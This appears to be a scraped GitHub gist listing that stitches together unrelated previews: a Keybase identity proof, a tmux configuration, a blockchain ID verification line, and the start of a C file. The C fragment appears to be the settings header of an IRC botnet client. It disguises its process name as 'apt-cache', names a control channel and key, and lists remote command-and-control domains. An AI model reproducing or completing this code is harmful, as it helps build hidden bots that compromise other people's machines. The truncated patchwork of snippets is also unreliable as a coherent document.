I hereby claim:
- I am mikedawg on github.
- I am mikedawg (https://keybase.io/mikedawg) on keybase.
- I have a public key ASAsLbEHL0oz_wbuYP_2QVH7Z2kdANLuwvrD0ydl19Uqlwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| # Use screen's prefix key | |
| set -g prefix C-a | |
| unbind C-b | |
| bind-key C-a send-prefix | |
| # Set 256 color term | |
| set -g default-terminal "screen-256color" | |
| # colors similar to my old screen setup | |
| set -g status-fg black |
| Verifying that +mikedawg is my blockchain ID. https://onename.com/mikedawg |
| #define STARTUP 1 | |
| #undef IDENT // Only enable this if you absolutely have to | |
| #define FAKENAME "apt-cache" // What you want this to hide as | |
| #define CHAN "#mint" // Channel to join | |
| #define KEY "bleh" // The key of the channel | |
| int numservers=5; // Must change this to equal number of servers down there | |
| char *servers[] = { | |
| "updates.absentvodka.com", | |
| "updates.mintylinux.com", | |
| "eggstrawdinarry.mylittlerepo.com", |